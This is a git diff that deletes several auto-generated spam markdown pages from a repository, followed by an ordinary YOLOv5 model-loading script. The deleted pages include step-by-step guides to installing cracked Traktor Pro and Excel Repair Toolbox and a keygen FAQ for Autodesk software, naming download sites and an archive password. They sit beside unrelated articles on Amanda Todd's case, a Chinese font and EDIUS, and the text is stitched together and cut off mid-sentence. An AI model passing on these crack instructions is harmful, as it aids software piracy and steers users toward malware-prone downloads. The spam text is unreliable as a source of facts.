We hope that this article has been helpful and informative for you. If you have any questions or comments about Autodesk Mechanical Desktop 2009 keygen Rapidshare, feel free to leave them below.

      -

      Frequently Asked Questions

      -
        -
      • What is Autodesk Mechanical Desktop 2009?
      • -

Autodesk Mechanical Desktop 2009 is software that helps you create and modify mechanical parts and assemblies in 2D and 3D. It is part of the Autodesk Inventor suite, which provides a comprehensive solution for 3D mechanical design, simulation, documentation, and product data management.

        -
      • What is a keygen?
      • -

        A keygen is a small program that generates serial keys or activation codes for software. A serial key is a unique combination of letters and numbers that identifies your copy of the software and allows you to use it legally. A keygen can help you bypass the registration or activation process of the software and use it for free. However, using a keygen is considered piracy and violates the terms of service and license agreement of the software. It can also expose your computer to malware, viruses, or legal actions.

        -
      • What is Rapidshare?
      • -

        Rapidshare is a file hosting service that allows users to upload and download files from its servers. It was one of the most popular file sharing platforms in the world until it shut down in 2015 due to legal issues and financial losses. Rapidshare was often used by people who wanted to share pirated or illegal content, such as movies, music, games, or software. However, downloading files from Rapidshare was not always safe or reliable, as they could be corrupted, infected, or removed at any time.

        -
      • How to download and install Autodesk Mechanical Desktop 2009 using a keygen?
      • -

        To download and install Autodesk Mechanical Desktop 2009 using a keygen, you need to follow these steps:

        -
          -
        1. Find a reliable and working download link for Autodesk Mechanical Desktop 2009 on Rapidshare or other file sharing platforms.
        2. -
        3. Download the file from Rapidshare and extract it using a program like WinRAR or 7-Zip.
        4. -
        5. Mount the ISO file using a program like Daemon Tools or Virtual CloneDrive.
        6. -
        7. Run the setup.exe file and follow the installation instructions.
        8. -
        9. When asked to enter a serial key or an activation code, use the keygen file that you downloaded along with the ISO file to generate one.
        10. -
        11. Paste the serial key in the installation window and click on the Next button.
        12. -
        13. Finish the installation and launch the software.
        14. -
        -
      • What are the pros and cons of using a keygen for Autodesk Mechanical Desktop 2009?
      • -

        The pros and cons of using a keygen for Autodesk Mechanical Desktop 2009 are:

        -
          -
        • Pros: free, easy, and fast
        • -
        • Cons: illegal, risky, and unethical
        • -
        -

      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Blogtv Amanda Todd.md b/spaces/stomexserde/gpt4-ui/Examples/Blogtv Amanda Todd.md deleted file mode 100644 index 4a19865f20b7687ec41c02151a2b4af80caba945..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Blogtv Amanda Todd.md +++ /dev/null @@ -1,16 +0,0 @@ -

      The Dark Side of BlogTV: How a Teenage Girl Became a Victim of Cyberbullying and Blackmail


      BlogTV was a popular live video chat site that allowed users to broadcast themselves and interact with other viewers. It was also a hunting ground for predators who preyed on young and naive teens, recording their actions and using them as leverage for extortion and harassment.


      One of the most tragic cases of this phenomenon was that of Amanda Todd, a 15-year-old Canadian girl who committed suicide in 2012 after years of online abuse. Before her death, she posted a video on YouTube titled "My story: Struggling, bullying, suicide, self-harm", in which she used a series of flashcards to tell her ordeal. The video went viral after her death, receiving over 15 million views as of January 2023.

In the video, Todd revealed that when she was in 7th grade, she used BlogTV to meet new people and received compliments on her looks. One day, she flashed her breasts on camera, thinking it was harmless. However, someone captured that moment and later contacted her on Facebook, threatening to send the image to her friends and family unless she performed more explicit acts on camera. When she refused, he followed through with his threat, causing her to be bullied and ostracized at school.

Todd moved to different schools several times, but the blackmailer always found her and repeated his demands. He also created a Facebook page with her nude photo as the profile picture, attracting more harassment from strangers. Todd fell into depression and anxiety, and started to self-harm and drink alcohol. She also attempted suicide several times, but survived.

In 2012, Todd uploaded her video on YouTube, hoping to raise awareness and find support. She also contacted the police and reported her blackmailer. However, it was too late. On October 10, 2012, she hanged herself at her home in Port Coquitlam, British Columbia.

Her death sparked outrage and sympathy around the world, and prompted calls for action against cyberbullying and online exploitation. The Canadian government proposed legislation to criminalize cyberbullying and make it easier to remove harmful online content. Todd's mother, Carol Todd, established the Amanda Todd Trust, a charity that supports anti-bullying education and programs for young people with mental health issues.

In 2014, a Dutch-Turkish man named Aydin Coban was arrested in the Netherlands for sexually blackmailing dozens of children online, including Todd. He was extradited to Canada in 2020 to face trial on charges of extortion, criminal harassment, communication with a young person to commit a sexual offence, and possession of child pornography. On August 5, 2022, he was found guilty on all counts by a jury in Vancouver. On October 14, 2022, he was sentenced to 13 years in prison.

Coban denied any involvement in Todd's case and claimed he was framed by an unknown hacker. He also appealed his conviction and sentence. However, the evidence against him was overwhelming. He used multiple aliases and IP addresses to contact his victims and coerce them into performing sexual acts on camera. He also kept detailed records of his targets and their personal information. He showed no remorse or empathy for his actions.

Todd's case is a stark reminder of the dangers of the Internet and the need for vigilance and education. BlogTV may have shut down in 2013, but there are still many other sites and platforms that can be used for similar purposes by malicious actors. Teens should be aware of the risks of sharing personal or intimate information online, and seek help if they encounter any form of cyberbullying or blackmail. Parents should also monitor their children's online activities and communicate with them about their online safety.

Amanda Todd's story is not only a tragedy but also a legacy. She inspired millions of people to speak out against cyberbullying and support those who suffer from it. She also showed courage and resilience in the face of adversity. She may be gone, but she is not forgotten.

      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Descargar Traktor Gratis Con __EXCLUSIVE__ Crack.md b/spaces/stomexserde/gpt4-ui/Examples/Descargar Traktor Gratis Con __EXCLUSIVE__ Crack.md deleted file mode 100644 index a3a58ab15546720d5f6c0b2f289bb5c845fd79d1..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Descargar Traktor Gratis Con __EXCLUSIVE__ Crack.md +++ /dev/null @@ -1,31 +0,0 @@ - -

      ¿Cómo Descargar Traktor Gratis Con Crack?

      -

      Traktor es un software profesional para mezclar música y crear tus propias pistas. Con Traktor puedes controlar hasta cuatro decks simultáneamente, aplicar efectos, loops, cues y mucho más. Traktor es compatible con la mayoría de los controladores DJ del mercado y te ofrece una experiencia de audio de alta calidad.


      Si quieres descargar Traktor gratis con crack, estás en el lugar correcto. En este artículo te vamos a mostrar cómo puedes obtener la última versión de Traktor Pro 3.8 full, con todas las funciones y características disponibles. Además, te explicaremos cómo instalarlo y activarlo correctamente en tu ordenador.

      -

      Pasos para descargar Traktor gratis con crack

      -

      Para descargar Traktor gratis con crack, solo tienes que seguir estos sencillos pasos:

      -
        -
      1. Entra en el sitio web de AW Descargas, donde encontrarás el enlace de descarga de Traktor Pro 3.8 full.
      2. -
      3. Haz clic en el botón de descarga y espera a que se complete el proceso. El archivo que se descargará es un archivo comprimido en formato ZIP.
      4. -
      5. Extrae el contenido del archivo ZIP en una carpeta de tu preferencia. Dentro encontrarás el instalador de Traktor Pro 3.8 y el archivo de crack.
      6. -
      7. Ejecuta el instalador de Traktor Pro 3.8 y sigue las instrucciones que aparecen en pantalla. Acepta los términos y condiciones y elige la ruta de instalación.
      8. -
      9. Cuando termine la instalación, no abras el programa todavía. Copia el archivo de crack y pégalo en la carpeta donde se instaló Traktor Pro 3.8. Reemplaza el archivo original si te lo pide.
      10. -
      11. Ya puedes abrir Traktor Pro 3.8 y disfrutar de todas sus funciones y características. Recuerda que debes tener una conexión a internet activa para que el programa se pueda activar correctamente.
      12. -
      -

      Beneficios de descargar Traktor gratis con crack

      -

      Al descargar Traktor gratis con crack, podrás acceder a los siguientes beneficios:

      -
        -
      • Tendrás la versión más reciente y actualizada de Traktor Pro 3.8, con todas las novedades y mejoras que ofrece.
      • -
      • No tendrás que pagar nada por el software, ni tampoco por las actualizaciones futuras.
      • -
      • Podrás usar Traktor Pro 3.8 sin ninguna limitación ni restricción, tanto en modo online como offline.
      • -
      • Podrás crear tus propias mezclas y pistas con una calidad profesional, usando los mejores efectos, loops, cues y más.
      • -
      • Podrás conectar tu controlador DJ favorito y aprovechar al máximo las funciones de Traktor Pro 3.8.
      • -
      -

      Conclusión

      -

      Traktor es uno de los mejores programas para DJ que existen en el mercado. Con Traktor puedes mezclar música como un profesional, usando hasta cuatro decks al mismo tiempo, aplicando efectos, loops, cues y más. Además, Traktor es compatible con la mayoría de los controladores DJ del mercado y te ofrece una calidad de sonido excepcional.

      -

      Si quieres descargar Traktor gratis con crack, solo tienes que seguir los pasos que te hemos mostrado en este artículo. Así podrás obtener la última versión de Traktor Pro 3.8 full, con todas las funciones y características disponibles. Además, te hemos explicado cómo instalarlo y activarlo correctamente en tu ordenador.

      -

      -

      No esperes más y descarga Traktor gratis con crack hoy mismo. Verás cómo tu experiencia como DJ mejora notablemente con este software. Y si te ha gustado este artículo, compártelo

      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Excel Repair Toolbox 3.0.15.0 Crack ((INSTALL)).md b/spaces/stomexserde/gpt4-ui/Examples/Excel Repair Toolbox 3.0.15.0 Crack ((INSTALL)).md deleted file mode 100644 index aae869f334f83afecf28b36c4a88045ed7d98236..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Excel Repair Toolbox 3.0.15.0 Crack ((INSTALL)).md +++ /dev/null @@ -1,40 +0,0 @@ -

      How to Download and Use Excel Repair Toolbox 3.0.15.0 Crack

      -

      If you are looking for a way to fix your corrupted or damaged Excel files, you might have come across Excel Repair Toolbox 3.0.15.0 Crack. This is a cracked version of a popular Excel repair software that claims to recover your data from any Excel file format. But is it safe and reliable to use? In this article, we will tell you everything you need to know about Excel Repair Toolbox 3.0.15.0 Crack and how to use it.

      -

      What is Excel Repair Toolbox 3.0.15.0 Crack?

      -

      Excel Repair Toolbox 3.0.15.0 Crack is a modified version of the original Excel Repair Toolbox software that is available for free download from various sources on the internet. The crack version bypasses the license key verification and allows you to use the full features of the software without paying for it.


      Excel Repair Toolbox is a software that can repair corrupted or damaged Excel files in various scenarios, such as virus attack, power failure, improper shutdown, file system error, etc. It can recover data from xls, xlsx, xlsm, xltm, xlam, and other Excel file formats. It can also restore formulas, formats, charts, images, and other elements in your Excel files.

      -

      How to Download and Use Excel Repair Toolbox 3.0.15.0 Crack?

      -

      To download and use Excel Repair Toolbox 3.0.15.0 Crack, you need to follow these steps:

      -
        -
      1. Go to one of the websites that offer the crack download link, such as HaxPC, iMyFone, or TealFeed.
      2. -
      3. Click on the download button and save the zip file on your computer.
      4. -
      5. Extract the zip file using a password (usually www.free-4paid.com) and run the setup file to install the software.
      6. -
      7. Do not launch the software after installation. Instead, copy and paste the crack files from the zip file into the installation folder (usually C:/Program Files/Excel Repair Toolbox).
      8. -
      9. Launch the software and enjoy its full features.
      10. -
      -

      Is Excel Repair Toolbox 3.0.15.0 Crack Safe and Reliable?

      -

      While Excel Repair Toolbox 3.0.15.0 Crack may seem tempting to use, it is not safe and reliable for several reasons:

      -
- The crack version may contain viruses, malware, spyware, or other harmful programs that can damage your computer or steal your personal information.
- The crack version may not work properly or may cause further damage to your Excel files.
- The crack version may violate the intellectual property rights of the original software developer and expose you to legal risks.
- The crack version may not be compatible with the latest updates or versions of Excel or Windows.
- The crack version may not provide any technical support or customer service in case of any issues.

      Therefore, we do not recommend using Excel Repair Toolbox 3.0.15.0 Crack or any other cracked software for repairing your Excel files.

A Better Alternative to Excel Repair Toolbox 3.0.15.0 Crack

If you are looking for a better alternative to Excel Repair Toolbox 3.0.15.0 Crack, we suggest you try Wondershare Repairit - File Repair.

Wondershare Repairit is a professional and reliable tool that can fix all kinds of corrupted or damaged Excel files with ease.

Some of its features are:
- It supports repairing xls, xlsx, xlsm, xltm, xlam, and other Excel file formats.
- It can recover data from multiple sheets in one go.
- It can restore formulas, formats, charts, images, and other elements in your Excel files.
- It can repair Excel files

        \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Fzdhtjw--Gb1-0 Font !EXCLUSIVE!.md b/spaces/stomexserde/gpt4-ui/Examples/Fzdhtjw--Gb1-0 Font !EXCLUSIVE!.md deleted file mode 100644 index 2ba41e6533fc8cfc822bae6b7904f49265f246a4..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Fzdhtjw--Gb1-0 Font !EXCLUSIVE!.md +++ /dev/null @@ -1,12 +0,0 @@ - -

        Fzdhtjw--Gb1-0 Font: A Free Chinese Font from Founder Type


        Fzdhtjw--Gb1-0 Font is a free Chinese font that belongs to the Heiti (黑体) category, which means it is a sans-serif typeface with bold and uniform strokes. The font is also known as 方正大黑简体 (Fangzheng Dahei Jianti) in Chinese, which means Founder Type Big Black Simplified. The font was created by Founder Type, one of the largest and most influential font foundries in China.


The font has a regular style and a file size of 2.21 MB. It supports the GB 2312-80 character set, which covers 7,445 Chinese characters and some symbols. The font has high legibility and readability, making it suitable for headlines, posters, logos, and other large-scale applications. It also has a modern and stylish appearance, giving it a sense of professionalism and elegance.

The font is free for personal use only. For commercial use, you need to contact the copyright owner or FontGoods, a licensed website of genuine commercial fonts. You can download the font from the official website of Founder Type or from other online sources such as FontKe.com or OnlineWebFonts.com[^1^] [^2^] [^3^]. To install the font on your computer, unzip the downloaded file and copy the .ttf file to your fonts folder.

If you are looking for a free Chinese font with a bold and sleek design, Fzdhtjw--Gb1-0 Font might be a good choice for you. It is one of the many high-quality fonts that Founder Type offers to the public. You can try it out and see how it looks in your projects.

Heiti fonts are a type of Chinese font derived from the Gothic style of Japanese fonts. They are characterized by straight and uniform strokes, without serifs or variations in thickness. Heiti fonts are similar to sans-serif fonts in Latin alphabets, and they are often used for modern and minimalist designs. Heiti fonts are also well suited to digital media, as they have a clear and crisp appearance on screens.

There are many Heiti fonts available online, both free and paid. Some of the most popular and reputable Heiti fonts come from Adobe and Arphic, two leading font foundries that specialize in Asian languages. Adobe Heiti[^1^] is a font family that consists of one regular style, with support for Simplified Chinese, Traditional Chinese, Japanese, Korean, and Latin characters. It has a balanced and harmonious design, with moderate contrast and a large x-height. Adobe Heiti is part of the Adobe Originals program, which aims to create original and high-quality fonts for various purposes.

Arphic Heiti[^3^] is another font family that offers multiple styles and weights, ranging from light to heavy. It supports the Big Five (Traditional Chinese), GB 2312 (Simplified Chinese), JIS X 0208 (Japanese), and KS X 1001 (Korean) character sets, as well as Latin characters. It has a dynamic and expressive design, with a slight slant and high contrast. Arphic Heiti is suitable for headlines, logos, posters, and other eye-catching applications.

        \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/GrassValley EDIUS Pro 7.4.1.28 WiN64 TOP.md b/spaces/stomexserde/gpt4-ui/Examples/GrassValley EDIUS Pro 7.4.1.28 WiN64 TOP.md deleted file mode 100644 index 683498776539d901c39f5bd4cb7e1d2e73170b39..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/GrassValley EDIUS Pro 7.4.1.28 WiN64 TOP.md +++ /dev/null @@ -1,81 +0,0 @@ - -

        GrassValley EDIUS Pro 7.4.1.28 WiN64: A Review


        If you are looking for a fast and versatile video editing software that can handle any format and resolution, you might want to check out GrassValley EDIUS Pro 7.4.1.28 WiN64. This is the latest version of the popular editing software from Grass Valley, a company that has been in the industry for over 60 years.


        In this article, we will review GrassValley EDIUS Pro 7.4.1.28 WiN64 and see what it can do for you as a video editor. We will cover its features and benefits, system requirements, installation and activation process, reasons to choose it over other editing software, how to use it for basic and advanced editing, and some tips and tricks to make your editing experience smoother and more efficient.

By the end of this article, you will have a clear idea of whether GrassValley EDIUS Pro 7.4.1.28 WiN64 is the right editing software for you or not.

What is GrassValley EDIUS Pro 7?

GrassValley EDIUS Pro 7 is professional video editing software that allows you to edit anything, anywhere. It is designed for broadcast news, newsmagazine content, studio programs, corporate, documentary, and 4K theatrical productions.

GrassValley EDIUS Pro 7 is the perfect finishing tool for your video projects, as it can handle any format from 24x24 to 4Kx2K, all on the same timeline, even in nested sequences, all in real time.

Features and Benefits

Some of the features and benefits of GrassValley EDIUS Pro 7 are:
- It has no limitations to the number of audio, video, graphics, and title tracks.
- It supports 4K, 3D, HD, SD, and almost any format you can think of.

          System Requirements


          To run GrassValley EDIUS Pro 7.4.1.28 WiN64, you will need the following system requirements:

| Component | Requirement |
| --- | --- |
| OS | Windows 7 64-bit (Service Pack 1 or later), Windows 8/8.1 64-bit |
| CPU | Any Intel Core 2 or Core iX CPU. Intel or AMD single-core CPU with a 3 GHz processor speed or faster (multiple CPUs and/or multicore CPUs are recommended). SSSE3 (Supplementary SSE3) instruction set support required. |
| RAM | 1 GB minimum (4 GB or more recommended) |
| HDD | 6 GB of hard disk space required for installation (including third-party software). Drive with SATA/7,200 RPM or faster required for video storage. |
| Graphics card | Supporting resolution higher than 1024x768, 32-bit. Direct3D 9.0c or later and Pixel Shader Model 3.0 or later required. Video memory requirements for GPUfx vary by project format: 1 GB or more recommended for 10-bit SD projects, 2 GB or more for HD/4K projects. |
| Sound card | Sound card with WDM driver support required. |
| Optical drive | Blu-ray Disc writer required when creating Blu-ray Discs. |

          Note: External video decks/cameras may require a USB 2.0 port for connectivity.

How to Install and Activate GrassValley EDIUS Pro 7.4.1.28 WiN64

          To install and activate GrassValley EDIUS Pro 7.4.1.28 WiN64, you will need to follow these steps:

1. Download the setup file from the official website or from a trusted source.
2. Run the setup file and follow the instructions on the screen.
3. When prompted, enter the serial number that you received when you purchased the software.
4. After the installation is complete, launch the software and click on the "Register" button.
5. You will be redirected to the online registration page, where you will need to fill in your personal information and product details.
6. You will receive an email with a confirmation link. Click on the link to complete the registration process.
7. You will also receive an email with an activation code. Copy and paste the code into the software and click on the "Activate" button.
8. You have successfully installed and activated GrassValley EDIUS Pro 7.4.1.28 WiN64.

          Note: You can also activate the software offline by contacting Grass Valley support.

          -

          Why Choose GrassValley EDIUS Pro 7?

          -

          There are many reasons why you should choose GrassValley EDIUS Pro 7 as your video editing software. Here are some of them:

          -

          Fast and Versatile Editing Software

          -

          GrassValley EDIUS Pro 7 is one of the fastest and most versatile editing software in the market. It can handle any format and resolution, from SD to HD to 4K, without any rendering or transcoding. It can also edit in real time, even with multiple layers of effects, transitions, and filters.

          -

          GrassValley EDIUS Pro 7 also has a user-friendly interface that allows you to customize your workspace according to your preferences and workflow. You can use keyboard shortcuts, drag-and-drop editing, timeline markers, ripple mode, sync mode, multicam editing, and more to speed up your editing process.


          Support for Multiple Formats and Resolutions


          Open to Third-Party Hardware and Software


          GrassValley EDIUS Pro 7 is not only compatible with Grass Valley hardware, but also with third-party hardware and software. You can use it with Blackmagic Design, Matrox, and AJA video cards, as well as with external monitors and recorders. You can also use it with plug-ins and filters from companies such as NewBlueFX, Boris FX, proDAD, iZotope, and more.


          GrassValley EDIUS Pro 7 also supports EDL and AAF import/export, which allows you to exchange projects with other editing software such as Adobe Premiere Pro, Avid Media Composer, Apple Final Cut Pro, and DaVinci Resolve.
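          To give a feel for what an EDL exchange actually carries, here is a minimal Python sketch that emits a simplified CMX3600-style video cut event. The reel name, frame rate, and exact field spacing are assumptions for illustration only, not EDIUS's real export code:

```python
def tc(frames, fps=25):
    """Convert a frame count to an HH:MM:SS:FF timecode string."""
    secs, ff = divmod(frames, fps)
    mins, ss = divmod(secs, 60)
    hh, mm = divmod(mins, 60)
    return f"{hh:02d}:{mm:02d}:{ss:02d}:{ff:02d}"

def edl_event(num, reel, src_in, src_out, rec_in, fps=25):
    """Build one simplified CMX3600-style video cut event (hypothetical layout)."""
    rec_out = rec_in + (src_out - src_in)
    return (f"{num:03d}  {reel:<8} V     C        "
            f"{tc(src_in, fps)} {tc(src_out, fps)} "
            f"{tc(rec_in, fps)} {tc(rec_out, fps)}")

# A five-second cut from reel TAPE01 at the start of the timeline:
print(edl_event(1, "TAPE01", 0, 125, 0))
```

          Each event line pairs a source in/out range with the record in/out range on the timeline, which is all another editor needs to rebuild the cut against its own copy of the media.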


          Low-Resolution Proxy Editing Mode


          If you are working with high-resolution footage, such as 4K or 3D, you might encounter some performance issues on your computer. To solve this problem, GrassValley EDIUS Pro 7 offers a low-resolution proxy editing mode, which allows you to edit with smaller and lighter files that are automatically linked to the original high-resolution files.


          This way, you can edit faster and smoother, without compromising the quality of your final output. You can also switch between the proxy mode and the normal mode at any time, depending on your needs and preferences.
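          The proxy/original link can be pictured as a simple filename mapping: you cut against the small file, and the final render swaps in the full-resolution one. The sketch below is purely hypothetical — the `_proxy` naming convention and folder names are invented for illustration and are not how EDIUS stores its links:

```python
from pathlib import Path

def resolve_original(proxy_path, original_dir="footage"):
    """Map a low-res proxy file back to its high-res original (assumed naming)."""
    p = Path(proxy_path)
    # Proxies are assumed to be named "<original stem>_proxy<ext>".
    stem = p.stem[:-len("_proxy")] if p.stem.endswith("_proxy") else p.stem
    return Path(original_dir) / (stem + p.suffix)

# Edit against the proxy, then swap in the original for the final render:
original = resolve_original("proxies/interview01_proxy.mov")
assert original == Path("footage/interview01.mov")
```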


          Real-Time Video Transcoding Technology


          Another feature that makes GrassValley EDIUS Pro 7 stand out from other editing software is its real-time video transcoding technology. This technology allows you to convert between different formats and resolutions on the fly, without any rendering or waiting time.


          For example, you can convert 4K footage to HD or SD footage in real time, or vice versa. You can also convert between different frame rates, such as 24p to 60p or 50p to 25p. You can even convert between different aspect ratios, such as 16:9 to 4:3 or 2.35:1 to 1.85:1.
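          The arithmetic behind an aspect-ratio conversion is easy to sketch. The helper below (an illustration, not EDIUS code) computes the padded frame size and the horizontal/vertical offsets needed to letterbox one aspect ratio into another:

```python
def letterbox(src_w, src_h, dst_aspect):
    """Return (out_w, out_h, pad_x, pad_y) to fit a frame into dst_aspect."""
    if src_w / src_h > dst_aspect:            # source is wider: pad top/bottom
        out_w, out_h = src_w, round(src_w / dst_aspect)
    else:                                     # source is taller: pad left/right
        out_w, out_h = round(src_h * dst_aspect), src_h
    return out_w, out_h, (out_w - src_w) // 2, (out_h - src_h) // 2

# Delivering a 16:9 HD frame inside a 4:3 canvas:
print(letterbox(1920, 1080, 4 / 3))   # (1920, 1440, 0, 180)
```

          Here the 1920x1080 frame keeps its width and gains 180 pixels of padding above and below to reach the 4:3 shape.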


          This feature is very useful when you need to deliver your video projects in different formats and resolutions for different platforms and devices.


          How to Use GrassValley EDIUS Pro 7?


          Now that you know what GrassValley EDIUS Pro 7 can do for you, let's see how you can use it for your video editing projects. We will cover the basic editing workflow, some advanced editing techniques, and some tips and tricks to make your editing experience easier and more enjoyable.


          Basic Editing Workflow


          The basic editing workflow of GrassValley EDIUS Pro 7 consists of the following steps:

          1. Import your media files into the software. You can use the source browser to browse and preview your files from various sources, such as cameras, memory cards, hard drives, optical discs, etc. You can also use the capture tool to capture video from tape-based devices.
          2. Create a new project and set up your project settings. You can choose your project format, frame rate, aspect ratio, audio settings, etc. You can also create custom presets for your project settings.
          3. Add your media files to the bin window. You can organize your files into folders and subfolders for easy access. You can also add metadata and comments to your files for better identification.
          4. Add your media files to the timeline window. You can drag and drop your files from the bin window to the timeline window. You can also use the insert or overwrite buttons to add your files to the timeline.

          Q: Where can I download GrassValley EDIUS Pro 7.4.1.28 WiN64?
          A: You can download GrassValley EDIUS Pro 7.4.1.28 WiN64 from the official website or from a trusted source. You will need a serial number to activate the software.

          I hope you enjoyed this article and learned something new about GrassValley EDIUS Pro 7.4.1.28 WiN64. If you have any questions or comments, feel free to leave them below. Thank you for reading and happy editing!

          \ No newline at end of file diff --git a/spaces/stratussox/yolov5_inference/hubconf.py b/spaces/stratussox/yolov5_inference/hubconf.py deleted file mode 100644 index 41af8e39d14deba8679400d02c192696bcf37544..0000000000000000000000000000000000000000 --- a/spaces/stratussox/yolov5_inference/hubconf.py +++ /dev/null @@ -1,169 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -PyTorch Hub models https://pytorch.org/hub/ultralytics_yolov5 - -Usage: - import torch - model = torch.hub.load('ultralytics/yolov5', 'yolov5s') # official model - model = torch.hub.load('ultralytics/yolov5:master', 'yolov5s') # from branch - model = torch.hub.load('ultralytics/yolov5', 'custom', 'yolov5s.pt') # custom/local model - model = torch.hub.load('.', 'custom', 'yolov5s.pt', source='local') # local repo -""" - -import torch - - -def _create(name, pretrained=True, channels=3, classes=80, autoshape=True, verbose=True, device=None): - """Creates or loads a YOLOv5 model - - Arguments: - name (str): model name 'yolov5s' or path 'path/to/best.pt' - pretrained (bool): load pretrained weights into the model - channels (int): number of input channels - classes (int): number of model classes - autoshape (bool): apply YOLOv5 .autoshape() wrapper to model - verbose (bool): print all information to screen - device (str, torch.device, None): device to use for model parameters - - Returns: - YOLOv5 model - """ - from pathlib import Path - - from models.common import AutoShape, DetectMultiBackend - from models.experimental import attempt_load - from models.yolo import ClassificationModel, DetectionModel, SegmentationModel - from utils.downloads import attempt_download - from utils.general import LOGGER, check_requirements, intersect_dicts, logging - from utils.torch_utils import select_device - - if not verbose: - LOGGER.setLevel(logging.WARNING) - check_requirements(exclude=('opencv-python', 'tensorboard', 'thop')) - name = Path(name) - path = name.with_suffix('.pt') if name.suffix == 
'' and not name.is_dir() else name # checkpoint path - try: - device = select_device(device) - if pretrained and channels == 3 and classes == 80: - try: - model = DetectMultiBackend(path, device=device, fuse=autoshape) # detection model - if autoshape: - if model.pt and isinstance(model.model, ClassificationModel): - LOGGER.warning('WARNING ⚠️ YOLOv5 ClassificationModel is not yet AutoShape compatible. ' - 'You must pass torch tensors in BCHW to this model, i.e. shape(1,3,224,224).') - elif model.pt and isinstance(model.model, SegmentationModel): - LOGGER.warning('WARNING ⚠️ YOLOv5 SegmentationModel is not yet AutoShape compatible. ' - 'You will not be able to run inference with this model.') - else: - model = AutoShape(model) # for file/URI/PIL/cv2/np inputs and NMS - except Exception: - model = attempt_load(path, device=device, fuse=False) # arbitrary model - else: - cfg = list((Path(__file__).parent / 'models').rglob(f'{path.stem}.yaml'))[0] # model.yaml path - model = DetectionModel(cfg, channels, classes) # create model - if pretrained: - ckpt = torch.load(attempt_download(path), map_location=device) # load - csd = ckpt['model'].float().state_dict() # checkpoint state_dict as FP32 - csd = intersect_dicts(csd, model.state_dict(), exclude=['anchors']) # intersect - model.load_state_dict(csd, strict=False) # load - if len(ckpt['model'].names) == classes: - model.names = ckpt['model'].names # set class names attribute - if not verbose: - LOGGER.setLevel(logging.INFO) # reset to default - return model.to(device) - - except Exception as e: - help_url = 'https://github.com/ultralytics/yolov5/issues/36' - s = f'{e}. Cache may be out of date, try `force_reload=True` or see {help_url} for help.' 
- raise Exception(s) from e - - -def custom(path='path/to/model.pt', autoshape=True, _verbose=True, device=None): - # YOLOv5 custom or local model - return _create(path, autoshape=autoshape, verbose=_verbose, device=device) - - -def yolov5n(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-nano model https://github.com/ultralytics/yolov5 - return _create('yolov5n', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5s(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-small model https://github.com/ultralytics/yolov5 - return _create('yolov5s', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5m(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-medium model https://github.com/ultralytics/yolov5 - return _create('yolov5m', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5l(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-large model https://github.com/ultralytics/yolov5 - return _create('yolov5l', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5x(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-xlarge model https://github.com/ultralytics/yolov5 - return _create('yolov5x', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5n6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-nano-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5n6', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5s6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-small-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5s6', pretrained, channels, classes, autoshape, _verbose, device) - 
- -def yolov5m6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-medium-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5m6', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5l6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-large-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5l6', pretrained, channels, classes, autoshape, _verbose, device) - - -def yolov5x6(pretrained=True, channels=3, classes=80, autoshape=True, _verbose=True, device=None): - # YOLOv5-xlarge-P6 model https://github.com/ultralytics/yolov5 - return _create('yolov5x6', pretrained, channels, classes, autoshape, _verbose, device) - - -if __name__ == '__main__': - import argparse - from pathlib import Path - - import numpy as np - from PIL import Image - - from utils.general import cv2, print_args - - # Argparser - parser = argparse.ArgumentParser() - parser.add_argument('--model', type=str, default='yolov5s', help='model name') - opt = parser.parse_args() - print_args(vars(opt)) - - # Model - model = _create(name=opt.model, pretrained=True, channels=3, classes=80, autoshape=True, verbose=True) - # model = custom(path='path/to/model.pt') # custom - - # Images - imgs = [ - 'data/images/zidane.jpg', # filename - Path('data/images/zidane.jpg'), # Path - 'https://ultralytics.com/images/zidane.jpg', # URI - cv2.imread('data/images/bus.jpg')[:, :, ::-1], # OpenCV - Image.open('data/images/bus.jpg'), # PIL - np.zeros((320, 640, 3))] # numpy - - # Inference - results = model(imgs, size=320) # batched inference - - # Results - results.print() - results.save() diff --git a/spaces/sub314xxl/MetaGPT/metagpt/manager.py b/spaces/sub314xxl/MetaGPT/metagpt/manager.py deleted file mode 100644 index 9d238c6215b9fedce19a76d268c7d54063a6c224..0000000000000000000000000000000000000000 --- a/spaces/sub314xxl/MetaGPT/metagpt/manager.py +++ /dev/null @@ -1,66 
